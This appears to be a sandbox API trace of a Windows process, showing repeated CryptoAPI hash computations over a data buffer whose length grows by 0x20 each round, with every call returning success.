	[0207.791] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.791] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.792] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.792] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0207.792] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc6e8
	[0207.792] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc6e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc6e8, pdwDataLen=0x129364) returned 1
	[0207.792] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.792] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.792] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.792] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.792] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0207.792] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc648
	[0207.792] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc648, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc648, pdwDataLen=0x129364) returned 1
	[0207.792] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.793] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.793] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.793] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.793] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0207.793] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc670
	[0207.793] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc670, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc670, pdwDataLen=0x129364) returned 1
	[0207.793] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.793] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.793] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.793] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.793] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0207.793] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc788
	[0207.793] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc788, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc788, pdwDataLen=0x129364) returned 1
	[0207.794] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.794] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.794] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.794] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.794] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0207.794] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.794] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc7b0
	[0207.794] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc7b0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc7b0, pdwDataLen=0x129364) returned 1
	[0207.794] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.794] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.794] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.794] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.794] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0207.794] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.794] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc7d8
	[0207.794] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc7d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc7d8, pdwDataLen=0x129364) returned 1
	[0207.794] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.795] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.795] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.795] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.795] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0207.795] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.795] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc800
	[0207.795] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc800, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc800, pdwDataLen=0x129364) returned 1
	[0207.795] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.795] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.795] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.795] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.795] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0207.795] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.795] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc828
	[0207.795] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc828, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc828, pdwDataLen=0x129364) returned 1
	[0207.795] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.795] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.796] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.796] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.796] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0207.796] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.796] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc850
	[0207.796] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc850, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc850, pdwDataLen=0x129364) returned 1
	[0207.796] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.796] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.796] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.796] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.796] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0207.796] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.796] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc878
	[0207.796] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc878, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc878, pdwDataLen=0x129364) returned 1
	[0207.796] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.796] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.797] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.797] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.797] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0207.797] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.797] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc8a0
	[0207.797] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc8a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc8a0, pdwDataLen=0x129364) returned 1
	[0207.797] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.797] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.797] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.797] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.797] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0207.797] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.797] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc8c8
	[0207.797] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc8c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc8c8, pdwDataLen=0x129364) returned 1
	[0207.797] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.797] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.798] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.798] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.798] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0207.798] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc8f0
	[0207.798] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc8f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc8f0, pdwDataLen=0x129364) returned 1
	[0207.798] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.798] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.798] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.798] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.798] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0207.798] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc918
	[0207.798] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc918, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc918, pdwDataLen=0x129364) returned 1
	[0207.798] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.798] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.798] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.799] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.799] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0207.799] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.799] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc940
	[0207.799] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc940, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc940, pdwDataLen=0x129364) returned 1
	[0207.799] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.799] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.799] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.799] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.799] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0207.799] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.799] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc968
	[0207.799] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc968, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc968, pdwDataLen=0x129364) returned 1
	[0207.799] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.799] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.799] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.800] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.800] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0207.800] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc990
	[0207.800] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc990, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc990, pdwDataLen=0x129364) returned 1
	[0207.800] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.800] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.800] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.800] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.800] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0207.800] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc9b8
	[0207.800] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc9b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc9b8, pdwDataLen=0x129364) returned 1
	[0207.800] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.800] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.800] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.801] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.801] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0207.801] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.801] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc9e0
	[0207.801] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc9e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc9e0, pdwDataLen=0x129364) returned 1
	[0207.801] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.801] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.801] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.801] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.801] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0207.801] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.801] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cca08
	[0207.801] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cca08, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cca08, pdwDataLen=0x129364) returned 1
	[0207.801] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.801] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.801] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.802] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.802] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0207.802] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.802] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cca30
	[0207.802] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cca30, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cca30, pdwDataLen=0x129364) returned 1
	[0207.802] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.802] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.802] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.802] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.802] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0207.802] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.802] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cca58
	[0207.802] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cca58, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cca58, pdwDataLen=0x129364) returned 1
	[0207.802] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.802] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.802] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.803] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.803] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0207.803] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cca80
	[0207.803] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cca80, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cca80, pdwDataLen=0x129364) returned 1
	[0207.803] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.803] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.803] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.803] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.803] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0207.803] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccaa8
	[0207.803] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26ccaa8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccaa8, pdwDataLen=0x129364) returned 1
	[0207.803] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.803] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.803] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.804] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.804] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0207.804] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.804] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccad0
	[0207.804] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26ccad0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccad0, pdwDataLen=0x129364) returned 1
	[0207.804] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.804] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.804] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.804] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.804] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0207.804] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
